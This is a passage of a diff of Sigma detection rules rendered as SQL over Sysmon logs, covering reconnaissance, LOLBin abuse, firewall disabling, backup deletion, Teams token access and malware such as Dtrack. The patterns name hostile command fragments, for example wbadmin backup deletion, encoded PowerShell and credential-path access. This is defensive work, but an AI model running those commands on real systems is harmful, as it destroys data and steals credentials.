'%\\\\Temp\\\\%' ESCAPE '\\' OR ParentImage LIKE '%\\\\Public\\\\%' ESCAPE '\\' OR ParentImage LIKE '%\\\\PerfLogs\\\\%' ESCAPE '\\') OR (Image LIKE '%\\\\apache%' ESCAPE '\\' OR Image LIKE '%\\\\tomcat%' ESCAPE '\\' OR Image LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Temp\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Public\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\PerfLogs\\\\%' ESCAPE '\\')))))" ], - "filename": "proc_creation_win_curl_susp_download.yml" + "filename": "proc_creation_win_susp_ntds.yml" }, { - "title": "Pubprn.vbs Proxy Execution", - "id": "1fb76ab8-fa60-4b01-bddd-71e89bf555da", + "title": "Suspicious Group And Account Reconnaissance Activity Using Net.EXE", + "id": "d95de845-b83c-4a9a-8a6a-4fc802ebf6c0", "status": "experimental", - "description": "Detects the use of the 'Pubprn.vbs' Microsoft signed script to execute commands.", - "author": "frack113", + "description": "Detects suspicious reconnaissance command line activity on Windows systems using Net.EXE", + "author": "Florian Roth (Nextron Systems), omkar72, @svch0st, Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1216.001" + "attack.discovery", + "attack.t1087.001", + "attack.t1087.002" ], "falsepositives": [ - "Unknown" + "Inventory tool runs", + "Administrative activity" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%\\\\pubprn.vbs%' ESCAPE '\\' AND CommandLine LIKE '%script:%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\net.exe' ESCAPE '\\' OR Image LIKE '%\\\\net1.exe' ESCAPE '\\') OR OriginalFileName IN ('net.exe', 'net1.exe')) AND ((((CommandLine LIKE '% group %' ESCAPE '\\' OR CommandLine LIKE '% localgroup %' ESCAPE '\\') AND (CommandLine LIKE '%domain admins%' ESCAPE '\\' OR CommandLine LIKE '% administrator%' ESCAPE '\\' OR CommandLine LIKE '% administrateur%' ESCAPE '\\' OR CommandLine LIKE '%enterprise admins%' ESCAPE '\\' OR CommandLine LIKE '%Exchange Trusted Subsystem%' ESCAPE '\\' OR CommandLine LIKE '%Remote Desktop Users%' ESCAPE '\\' OR CommandLine LIKE '%Utilisateurs du Bureau à distance%' ESCAPE '\\' OR CommandLine LIKE '%Usuarios de escritorio remoto%' ESCAPE '\\' OR CommandLine LIKE '% /do%' ESCAPE '\\')) AND NOT (CommandLine LIKE '% /add%' ESCAPE '\\')) OR (CommandLine LIKE '% accounts %' ESCAPE '\\' AND CommandLine LIKE '% /do%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_lolbin_pubprn.yml" + "filename": "proc_creation_win_net_groups_and_accounts_recon.yml" }, { - "title": "Add New Windows Capability - ProcCreation", - "id": "b36d01a3-ddaf-4804-be18-18a6247adfcd", + "title": "Suspicious PowerShell Child Processes", + "id": "e4b6d2a7-d8a4-4f19-acbd-943c16d90647", "status": "experimental", - "description": "Detects usage of the \"Add-WindowsCapability\" cmdlet to add new windows capabilities. Notable capabilities could be \"OpenSSH\" and others.", - "author": "Nasreddine Bencherchali (Nextron Systems)", - "tags": [ - "attack.execution" - ], + "description": "Detects suspicious child processes spawned by PowerShell", + "author": "Florian Roth (Nextron Systems), Tim Shelton", "falsepositives": [ - "Legitimate usage of the capabilities by administartors or users. Filter accordingly" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND CommandLine LIKE '%Add-WindowsCapability%' ESCAPE '\\' AND CommandLine LIKE '%OpenSSH.%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((ParentImage LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\powershell\\_ise.exe' ESCAPE '\\') AND (Image LIKE '%\\\\sh.exe' ESCAPE '\\' OR Image LIKE '%\\\\bash.exe' ESCAPE '\\' OR Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR Image LIKE '%\\\\certutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\scrcons.exe' ESCAPE '\\' OR Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR Image LIKE '%\\\\hh.exe' ESCAPE '\\' OR Image LIKE '%\\\\wmic.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR Image LIKE '%\\\\forfiles.exe' ESCAPE '\\' OR Image LIKE '%\\\\scriptrunner.exe' ESCAPE '\\')) AND NOT ((ParentCommandLine LIKE '%\\\\Program Files\\\\Amazon\\\\WorkspacesConfig\\\\Scripts\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\Program Files\\\\Amazon\\\\WorkspacesConfig\\\\Scripts\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_powershell_add_windows_capability.yml" + "filename": "proc_creation_win_powershell_susp_child_processes.yml" }, { - "title": "Disabled IE Security Features", - "id": "fb50eb7a-5ab1-43ae-bcc9-091818cb8424", + "title": "Fake Instance Of Hxtsr.exe", + "id": "4e762605-34a8-406d-b72e-c1a089313320", "status": "test", - "description": "Detects command lines that indicate unwanted modifications to registry keys that disable important Internet Explorer security features", - "author": "Florian Roth (Nextron Systems)", + "description": "HxTsr.exe is a Microsoft compressed executable file called Microsoft Outlook Communications.\nHxTsr.exe is part of Outlook apps, because it resides in a hidden \"WindowsApps\" subfolder of \"C:\\Program Files\".\nIts path includes a version number, e.g., \"C:\\Program Files\\WindowsApps\\microsoft.windowscommunicationsapps_17.7466.41167.0_x64__8wekyb3d8bbwe\\HxTsr.exe\".\nAny instances of hxtsr.exe not in this folder may be malware camouflaging itself as HxTsr.exe\n", + "author": "Sreeman", "tags": [ "attack.defense_evasion", - "attack.t1562.001" + "attack.t1036" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '% -name IEHarden %' ESCAPE '\\' AND CommandLine LIKE '% -value 0 %' ESCAPE '\\') OR (CommandLine LIKE '% -name DEPOff %' ESCAPE '\\' AND CommandLine LIKE '% -value 1 %' ESCAPE '\\') OR (CommandLine LIKE '% -name DisableFirstRunCustomize %' ESCAPE '\\' AND CommandLine LIKE '% -value 2 %' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND Image = 'hxtsr.exe' AND NOT (CurrentDirectory LIKE 'C:\\\\program files\\\\windowsapps\\\\microsoft.windowscommunicationsapps\\_%' ESCAPE '\\' AND CurrentDirectory LIKE '%\\\\hxtsr.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_powershell_disable_ie_features.yml" + "filename": "proc_creation_win_hxtsr_masquerading.yml" }, { - "title": "MERCURY APT Activity", - "id": "a62298a3-1fe0-422f-9a68-ffbcbc5a123d", + "title": "Remote File Download via Desktopimgdownldr Utility", + "id": "214641c2-c579-4ecb-8427-0cf19df6842e", "status": "experimental", - "description": "Detects suspicious command line patterns seen being used by MERCURY APT", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects the desktopimgdownldr utility being used to download a remote file. An adversary may use desktopimgdownldr to download arbitrary files as an alternative to certutil.", + "author": "Tim Rauch", "tags": [ - "attack.execution", - "attack.t1059.001", - "attack.g0069" + "attack.command_and_control", + "attack.t1105" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%-exec bypass -w 1 -enc%' ESCAPE '\\' AND CommandLine LIKE '%UwB0AGEAcgB0AC0ASgBvAGIAIAAtAFMAYwByAGkAcAB0AEIAbABvAGMAawAgAHsAKABzAGEAcABzACAAKAAiAHAA%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\desktopimgdownldr.exe' ESCAPE '\\' AND ParentImage LIKE '%\\\\desktopimgdownldr.exe' ESCAPE '\\' AND CommandLine LIKE '%/lockscreenurl:http%' ESCAPE '\\')" ], - "filename": "proc_creation_win_apt_mercury.yml" + "filename": "proc_creation_win_desktopimgdownldr_remote_file_download.yml" }, { - "title": "AADInternals PowerShell Cmdlets Execution - ProccessCreation", - "id": "c86500e9-a645-4680-98d7-f882c70c1ea3", + "title": "HackTool - SysmonEOP Execution", + "id": "8a7e90c5-fe6e-45dc-889e-057fe4378bd9", "status": "experimental", - "description": "Detects ADDInternals Cmdlet execution. A tool for administering Azure AD and Office 365. Which can be abused by threat actors to attack Azure AD or Office 365.", - "author": "Austin Songer (@austinsonger), Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects the execution of the PoC that can be used to exploit Sysmon CVE-2022-41120", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", - "attack.reconnaissance", - "attack.discovery", - "attack.credential_access", - "attack.impact" + "cve.2022.41120", + "attack.t1068", + "attack.privilege_escalation" ], "falsepositives": [ - "Legitimate use of the library for administrative activity" + "Unlikely" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.Exe', 'pwsh.dll')) AND (CommandLine LIKE '%Add-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%ConvertTo-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Disable-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Enable-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Export-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Get-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Grant-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Install-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Join-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%New-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Open-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Read-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Register-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Remove-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Restore-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Search-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Send-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Set-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Start-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Update-AADInt%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\SysmonEOP.exe' ESCAPE '\\' OR Hashes IN ('IMPHASH=22F4089EB8ABA31E1BB162C6D9BF72E5', 'IMPHASH=5123FA4C4384D431CD0D893EEB49BBEC') OR Imphash IN ('22f4089eb8aba31e1bb162c6d9bf72e5', '5123fa4c4384d431cd0d893eeb49bbec')))" ], - "filename": "proc_creation_win_powershell_aadinternals_cmdlets_execution.yml" + "filename": "proc_creation_win_hktl_sysmoneop.yml" }, { - "title": "HackTool - SILENTTRINITY Stager Execution", - "id": "03552375-cc2c-4883-bbe4-7958d5a980be", - "status": "test", - "description": "Detects SILENTTRINITY stager use via PE metadata", - "author": "Aleksey Potapov, oscd.community", + "title": "Potential Dtrack RAT Activity", + "id": "f1531fa4-5b84-4342-8f68-9cf3fdbd83d4", + "status": "stable", + "description": "Detects potential Dtrack RAT activity via specific process patterns", + "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.t1071" + "attack.impact", + "attack.t1490" ], "falsepositives": [ "Unlikely" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Description LIKE '%st2stager%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%ping -n %' ESCAPE '\\' AND CommandLine LIKE '% echo EEEE > %' ESCAPE '\\') OR (CommandLine LIKE '%ipconfig /all%' ESCAPE '\\' AND CommandLine LIKE '%\\\\temp\\\\res.ip%' ESCAPE '\\') OR (CommandLine LIKE '%interface ip show config%' ESCAPE '\\' AND CommandLine LIKE '%\\\\temp\\\\netsh.res%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_hktl_silenttrinity_stager.yml" + "filename": "proc_creation_win_malware_dtrack.yml" }, { - "title": "Suspicious Usage Of ShellExec_RunDLL", - "id": "d87bd452-6da1-456e-8155-7dc988157b7d", + "title": "Suspicious Powercfg Execution To Change Lock Screen Timeout", + "id": "f8d6a15e-4bc8-4c27-8e5d-2b10f0b73e5b", "status": "experimental", - "description": "Detects suspicious usage of the ShellExec_RunDLL function to launch other commands as seen in the the raspberry-robin attack", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects suspicious execution of 'Powercfg.exe' to change lock screen timeout", + "author": "frack113", "tags": [ "attack.defense_evasion" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%ShellExec\\_RunDLL%' ESCAPE '\\' AND (CommandLine LIKE '%regsvr32%' ESCAPE '\\' OR CommandLine LIKE '%msiexec%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%odbcconf%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-%' ESCAPE '\\' OR CommandLine LIKE '%iex%' ESCAPE '\\' OR CommandLine LIKE '%comspec%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\powercfg.exe' ESCAPE '\\' OR OriginalFileName = 'PowerCfg.exe') AND ((CommandLine LIKE '%/setacvalueindex %' ESCAPE '\\' AND CommandLine LIKE '%SCHEME\\_CURRENT%' ESCAPE '\\' AND CommandLine LIKE '%SUB\\_VIDEO%' ESCAPE '\\' AND CommandLine LIKE '%VIDEOCONLOCK%' ESCAPE '\\') OR (CommandLine LIKE '%-change %' ESCAPE '\\' AND CommandLine LIKE '%-standby-timeout-%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_rundll32_susp_shellexec_execution.yml" + "filename": "proc_creation_win_powercfg_execution.yml" }, { - "title": "Potential File Overwrite Via Sysinternals SDelete", - "id": "a4824fca-976f-4964-b334-0621379e84c4", + "title": "Copy From VolumeShadowCopy Via Cmd.EXE", + "id": "c73124a7-3e89-44a3-bdc1-25fe4df754b1", "status": "experimental", - "description": "Detects the use of SDelete to erase a file not the free space", - "author": "frack113", + "description": "Detects the execution of the builtin \"copy\" command that targets a shadow copy (sometimes used to copy registry hives that are in use)", + "author": "Max Altgelt (Nextron Systems), Tobias Michalski (Nextron Systems)", "tags": [ "attack.impact", - "attack.t1485" + "attack.t1490" ], "falsepositives": [ - "Unknown" + "Backup scenarios using the commandline" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND OriginalFileName = 'sdelete.exe' AND NOT ((CommandLine LIKE '% -h%' ESCAPE '\\' OR CommandLine LIKE '% -c%' ESCAPE '\\' OR CommandLine LIKE '% -z%' ESCAPE '\\' OR CommandLine LIKE '% /\\?%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%copy %' ESCAPE '\\' AND CommandLine LIKE '%\\\\\\\\\\?\\\\GLOBALROOT\\\\Device\\\\HarddiskVolumeShadowCopy%' ESCAPE '\\')" ], - "filename": "proc_creation_win_sysinternals_sdelete.yml" + "filename": "proc_creation_win_cmd_shadowcopy_access.yml" }, { - "title": "PUA - Advanced Port Scanner Execution", - "id": "54773c5f-f1cc-4703-9126-2f797d96a69d", + "title": "Suspicious Schtasks Execution AppData Folder", + "id": "c5c00f49-b3f9-45a6-997e-cfdecc6e1967", "status": "experimental", - "description": "Detects the use of Advanced Port Scanner.", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects the creation of a schtask that executes a file from C:\\Users\\\\AppData\\Local", + "author": "pH-T (Nextron Systems), Nasreddine Bencherchali", "tags": [ - "attack.discovery", - "attack.t1046", - "attack.t1135" + "attack.execution", + "attack.persistence", + "attack.t1053.005", + "attack.t1059.001" ], "falsepositives": [ - "Legitimate administrative use", - "Tools with similar commandline (very rare)" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\advanced\\_port\\_scanner%' ESCAPE '\\' OR OriginalFileName LIKE '%advanced\\_port\\_scanner%' ESCAPE '\\' OR Description LIKE '%Advanced Port Scanner%' ESCAPE '\\') OR (CommandLine LIKE '%/portable%' ESCAPE '\\' AND CommandLine LIKE '%/lng%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' AND CommandLine LIKE '%/Create%' ESCAPE '\\' AND CommandLine LIKE '%/RU%' ESCAPE '\\' AND CommandLine LIKE '%/TR%' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\' AND (CommandLine LIKE '%NT AUT%' ESCAPE '\\' OR CommandLine LIKE '% SYSTEM %' ESCAPE '\\')) AND NOT (ParentImage LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' AND ParentImage LIKE '%TeamViewer\\_.exe%' ESCAPE '\\' AND Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' AND CommandLine LIKE '%/TN TVInstallRestore%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_pua_advanced_port_scanner.yml" + "filename": "proc_creation_win_schtasks_appdata_local_system.yml" }, { - "title": "SystemStateBackup Deleted Using Wbadmin.EXE", - "id": "89f75308-5b1b-4390-b2d8-d6b2340efaf8", + "title": "Suspicious WmiPrvSE Child Process", + "id": "8a582fe2-0882-4b89-a82a-da6b2dc32937", "status": "test", - "description": "Deletes the Windows systemstatebackup using wbadmin.exe.\nThis technique is used by numerous ransomware families.\nThis may only be successful on server platforms that have Windows Backup enabled.\n", - "author": "frack113", + "description": "Detects suspicious and uncommon child processes of WmiPrvSE", + "author": "Vadim Khrykov (ThreatIntel), Cyb3rEng, Florian Roth (Nextron Systems)", "tags": [ - "attack.impact", - "attack.t1490" + "attack.execution", + "attack.defense_evasion", + "attack.t1047", + "attack.t1204.002", + "attack.t1218.010" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\wbadmin.exe' ESCAPE '\\' OR OriginalFileName = 'WBADMIN.EXE') AND (CommandLine LIKE '%delete %' ESCAPE '\\' AND CommandLine LIKE '%systemstatebackup %' ESCAPE '\\' AND CommandLine LIKE '%-keepVersions:0%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ParentImage LIKE '%\\\\wbem\\\\WmiPrvSE.exe' ESCAPE '\\' AND ((Image LIKE '%\\\\certutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Image LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR Image LIKE '%\\\\verclsid.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\') OR (Image LIKE '%\\\\cmd.exe' ESCAPE '\\' AND (CommandLine LIKE '%cscript%' ESCAPE '\\' OR CommandLine LIKE '%mshta%' ESCAPE '\\' OR CommandLine LIKE '%powershell%' ESCAPE '\\' OR CommandLine LIKE '%pwsh%' ESCAPE '\\' OR CommandLine LIKE '%regsvr32%' ESCAPE '\\' OR CommandLine LIKE '%rundll32%' ESCAPE '\\' OR CommandLine LIKE '%wscript%' ESCAPE '\\')))) AND NOT ((Image LIKE '%\\\\WerFault.exe' ESCAPE '\\') OR (Image LIKE '%\\\\WmiPrvSE.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_wbadmin_delete_systemstatebackup.yml" + "filename": "proc_creation_win_wmiprvse_susp_child_processes.yml" }, { - "title": "Suspicious Command With Teams Objects Paths", - "id": "d2eb17db-1d39-41dc-b57f-301f6512fa75", + "title": "Windows Firewall Disabled via PowerShell", + "id": "12f6b752-042d-483e-bf9c-915a6d06ad75", "status": "experimental", - "description": "Detects an access to authentication tokens and accounts of Microsoft Teams desktop application.", - "author": "@SerkinValery", + "description": "Detects attempts to disable the Windows Firewall using PowerShell", + "author": "Tim Rauch", "tags": [ - "attack.credential_access", - "attack.t1528" + "attack.defense_evasion", + "attack.t1562" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine LIKE '%\\\\Microsoft\\\\Teams\\\\Cookies%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Microsoft\\\\Teams\\\\Local Storage\\\\leveldb%' ESCAPE '\\') AND NOT (Image LIKE '%\\\\Microsoft\\\\Teams\\\\current\\\\Teams.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell\\_ise.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND (CommandLine LIKE '%Set-NetFirewallProfile %' ESCAPE '\\' AND CommandLine LIKE '% -Enabled %' ESCAPE '\\' AND CommandLine LIKE '% False%' ESCAPE '\\') AND (CommandLine LIKE '% -All %' ESCAPE '\\' OR CommandLine LIKE '%Public%' ESCAPE '\\' OR CommandLine LIKE '%Domain%' ESCAPE '\\' OR CommandLine LIKE '%Private%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_teams_suspicious_command_line_cred_access.yml" + "filename": "proc_creation_win_powershell_disable_firewall.yml" }, { - "title": "PUA - Seatbelt Execution", - "id": "38646daa-e78f-4ace-9de0-55547b2d30da", + "title": "Suspicious Elevated System Shell", + "id": "178e615d-e666-498b-9630-9ed363038101", "status": "experimental", - "description": "Detects the execution of the PUA/Recon tool Seatbelt via PE information of command line parameters", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects when a shell program such as the windows Command Prompt or PowerShell is launched with system privileges.", + "author": "frack113, Tim Shelton (update fp)", "tags": [ - "attack.discovery", - "attack.t1526", - "attack.t1087", - "attack.t1083" + "attack.privilege_escalation", + "attack.defense_evasion", + "attack.execution", + "attack.t1059" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\Seatbelt.exe' ESCAPE '\\' OR OriginalFileName = 'Seatbelt.exe' OR Description = 'Seatbelt' OR (CommandLine LIKE '% DpapiMasterKeys%' ESCAPE '\\' OR CommandLine LIKE '% InterestingProcesses%' ESCAPE '\\' OR CommandLine LIKE '% InterestingFiles%' ESCAPE '\\' OR CommandLine LIKE '% CertificateThumbprints%' ESCAPE '\\' OR CommandLine LIKE '% ChromiumBookmarks%' ESCAPE '\\' OR CommandLine LIKE '% ChromiumHistory%' ESCAPE '\\' OR CommandLine LIKE '% ChromiumPresence%' ESCAPE '\\' OR CommandLine LIKE '% CloudCredentials%' ESCAPE '\\' OR CommandLine LIKE '% CredEnum%' ESCAPE '\\' OR CommandLine LIKE '% CredGuard%' ESCAPE '\\' OR CommandLine LIKE '% FirefoxHistory%' ESCAPE '\\' OR CommandLine LIKE '% ProcessCreationEvents%' ESCAPE '\\')) OR ((CommandLine LIKE '% -group=misc%' ESCAPE '\\' OR CommandLine LIKE '% -group=remote%' ESCAPE '\\' OR CommandLine LIKE '% -group=chromium%' ESCAPE '\\' OR CommandLine LIKE '% -group=slack%' ESCAPE '\\' OR CommandLine LIKE '% -group=system%' ESCAPE '\\' OR CommandLine LIKE '% -group=user%' ESCAPE '\\' OR CommandLine LIKE '% -group=all%' ESCAPE '\\') AND CommandLine LIKE '% -outputfile=%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\cmd.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll', 'Cmd.Exe')) AND ((User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\') AND LogonId = '0x3e7')) AND NOT (((ParentImage LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR ParentImage LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\' OR ParentImage LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\') AND (Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell.exe' ESCAPE '\\')) OR (ParentImage LIKE 'C:\\\\ManageEngine\\\\ADManager Plus\\\\pgsql\\\\bin\\\\postgres.exe' ESCAPE '\\' AND Image LIKE '%\\\\cmd.exe' ESCAPE '\\') OR (ParentImage LIKE 'C:\\\\Windows\\\\SysWOW64\\\\config\\\\systemprofile\\\\Citrix\\\\UpdaterBinaries\\\\%' ESCAPE '\\' AND ParentImage LIKE '%\\\\CitrixReceiverUpdater.exe' ESCAPE '\\' AND Image LIKE '%\\\\cmd.exe' ESCAPE '\\') OR (CommandLine LIKE 'C:\\\\WINDOWS\\\\system32\\\\cmd.exe /c \"%' ESCAPE '\\' AND CurrentDirectory LIKE '%C:\\\\WINDOWS\\\\Temp\\\\asgard2-agent\\\\%' ESCAPE '\\') OR (ParentImage LIKE 'C:\\\\Windows\\\\Temp%' ESCAPE '\\' AND ParentImage LIKE '%\\\\invcol.exe' ESCAPE '\\' AND ParentCommandLine LIKE '%C:\\\\ProgramData\\\\Dell\\\\UpdateService\\\\%' ESCAPE '\\' AND Image LIKE '%\\\\cmd.exe' ESCAPE '\\') OR (ParentImage LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\' AND ParentImage LIKE '%\\\\CompatTelRunner.exe' ESCAPE '\\' AND ParentCommandLine LIKE 'C:\\\\Windows\\\\system32\\\\CompatTelRunner.exe -m:appraiser.dll -f:DoScheduledTelemetryRun%' ESCAPE '\\') OR (ParentImage LIKE 'C:\\\\IBM\\\\SpectrumProtect\\\\webserver\\\\scripts\\\\%' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\IBM\\\\SpectrumProtect\\\\webserver\\\\scripts\\\\%' ESCAPE '\\') OR (CommandLine = 'powershell.exe -ExecutionPolicy Restricted -Command Write-Host ''Final result: 1'';') OR (Image LIKE '%\\\\cmd.exe' ESCAPE '\\' AND CommandLine LIKE '%/d /c C:\\\\Windows\\\\system32\\\\silcollector.cmd%' ESCAPE '\\') OR (Image LIKE '%\\\\cmd.exe' ESCAPE '\\' AND (CommandLine LIKE '%cmd.exe /c btool server list replication\\_port --no-log' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /c btool server list general --no-log' ESCAPE '\\')) OR (Image LIKE '%\\\\cmd.exe' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\Windows\\\\system32\\\\reg.exe query 